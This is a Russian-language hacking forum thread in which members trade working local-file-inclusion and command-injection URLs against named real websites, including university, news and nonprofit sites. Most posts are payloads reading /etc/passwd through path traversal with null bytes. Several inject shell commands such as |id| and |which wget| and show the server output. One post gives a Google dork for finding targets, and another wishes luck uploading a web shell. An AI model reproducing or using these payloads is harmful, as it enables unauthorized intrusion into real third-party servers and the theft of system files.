PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    можно еще вот здесь покопатся

    http:// de n.zp.ua/index.php?page=../filename
     
  2. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
     
  3. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Code:
    http://fanforum.org.ua/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
    Code:
    http://www.itnr.ru/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
    Code:
    http://wirfilms.com/misc.php?do=info&show=../../../../../../../../etc/passwd%00.html
     
    1 person likes this.
  4. vasyan

    vasyan New Member

    Joined:
    13 May 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    http://www.hcs.harvard.edu/gradmus/abstract.php?name=../../../../../../../../../../../../../../../etc/passwd%00

    или так

    http://www.hcs.harvard.edu/gradmus/abstract.php?name=../abstract.php%00
    :)
     
  5. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    http://www.mtcwork.com.au/innovation.php?file=../../../../../../../../../../etc/passwd
    OS: FreeBSD
     
  6. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    U.S. Department of Housing and Urban Development
     
    1 person likes this.
  7. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    ololo
     
    1 person likes this.
  8. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    Master PFP (Printer Friendly Page) v1.7 - multi-file include

    Здесь для этого, наверное, самое место.

    Master PFP (Printer Friendly Page) v1.7 - multi-file include

    Off.site: www.willmaster.com
    Google: 'inurl:MasterPFP.pl?doc='

    Скидываю оптом =]

    На Офф.сайте:
    Code:
    www.willmaster.com/software/pfp/MasterPFP.cgi?doc=../../../
    .edu
    Code:
    www.rsp.wisc.edu/scripts/MasterPFP.pl?doc=../../../../../etc/passwd
    Выполнение команд:
    Code:
    http://www.insolvenzrechtstag.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
    Code:
    http://www.german-philharmonic-bigband.de/cgi-bin-local/masterpfp.cgi?doc=|ls|
    И т.д:
    Code:
    www.vtol.org/cgi-bin/masterpfp.cgi?doc=../../../../etc/passwd
    Code:
    www.womensweb.ca/cgi-bin/MasterPFP.cgi?doc=../../../../etc/passwd
    Code:
    www.dianaskitchen.com/cgi-bin/MasterPFP.cgi?doc=../../../etc/passwd
    Code:
    www.faktuell.de/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd
    Code:
    www.genuinecoaching.com/cgi/MasterPFP/MasterPFP.cgi?doc=../../../../../../../etc/passwd
    Code:
    www.delbert.com/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd
    Code:
    www.circare.org/FOIA/MasterPFP.cgi?doc=../../../etc/passwd
    Code:
    www.eagleforum.org/cgi_bin/print/MasterPFP.cgi?doc=../../../../../../etc/passwd
    Code:
    www.varstrat.com/cgi-bin/MasterPFP.cgi?doc=../../../../../etc/passwd
     
    2 people like this.
  9. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Code:
    http://www.3sys.de/index/index.pl?url=download-index.de&seite=|id|

    uid=30(wwwrun) gid=60001(visas) groups=60001(visas)


    Code:
    http://www.3sys.de/index/index.pl?url=download-index.de&seite=|which%20wget|
    /usr/bin/wget


    ; ))))))
     
    1 person likes this.
  10. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Еще немного скину

    1)
    leinebeerfilms.nl
    Code:
    http://www.kleinebeerfilms.nl/cgi-bin/index.pl?page=../../../../../../../../../etc/passwd%00.txt
    neilthompson.us
    Code:
    http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|id|
    uid=465686 gid=888(vusers) groups=33(www-data)

    Code:
    http://www.neilthompson.us/iec5qz8twrqk/fhist/page.pl?page=|which%20wget|
    /usr/bin/wget

    удачи с заливкой шелла ; ))
     
  11. vasyan

    vasyan New Member

    Joined:
    13 May 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    http://iah.ipm.illinois.edu/index.php?ch=../../etc/passwd
     
  12. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 4]
    Code:
    http://www.sitemad.com/index.php?p=popup&tpl=/etc/passwd
    [PR 3]
    Code:
    http://www.doc-darmer-net.de/hpmaker/index.php?p=/etc/passwd
    [PR 2]
    Code:
    http://www.gustatus.org/index.php?p=index.php
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://mzrd.ru/?f=../../../../../../../../../../../../../etc/passwd%00
     
    _________________________
    1 person likes this.
  14. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    www.CBC.ca - Canadian News [PR 8]
    Code:
    www.cbc.ca/cgi-bin/quiz/quiz.cgi?quiz=../../../../../../../../etc/passwd%00
     
    1 person likes this.
  15. ProoF

    ProoF Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    27
    Likes Received:
    8
    Reputations:
    1
    catenabrasil.com

     
  16. ProoF

    ProoF Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    27
    Likes Received:
    8
    Reputations:
    1
    WINNT

     
  17. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    .edu.pl [PR 5]

    Code:
    http://www.amp.edu.pl/eng/index.php?strona=../../../../../../../../etc/passwd%00
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.beauteby.com/ru/gernetic/luxe.php?id=../../../../index
     
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Code:
    http://www.orion.ua/modules/CATALOG/download.php?file=../../../../../../../../../../../../../../../../../etc/passwd%00%00
    LFI

    Много чего интересного,но к сайтам на VPS закрыт доступ (((.Толком-то я там не исследовал ничего...httpd.conf оежит по стандартному пути - /etc/httpd/conf/httpd.conf

    В общем,если что надыбаете - пишите в PM/ЛС/icq )

    И ещё: Если фаил или папка существует,то выдаст на скачку .pdf фаил.Переименовываете его в .doc(Так сразу форматирует,не то,что txt) или в .html.Если html,то открываете IE(имхо - лучший вариант).Если фаила нету,то просто белый экран.Также проверяются и каталоги.Если нету прав,то выдастся на скачку фаил в 1 KB.Там будет ошибка в file_get_contents() и сама ошибка - Permission Denied.Вот и всё.Спасибо всем:)
     
    1 person likes this.
  20. gluke

    gluke Banned

    Joined:
    6 Jun 2008
    Messages:
    33
    Likes Received:
    40
    Reputations:
    1
    Code:
    http://www.wines.at/forum/setcookie.php?u=../../../../../../../../../../../../etc/passwd%00%00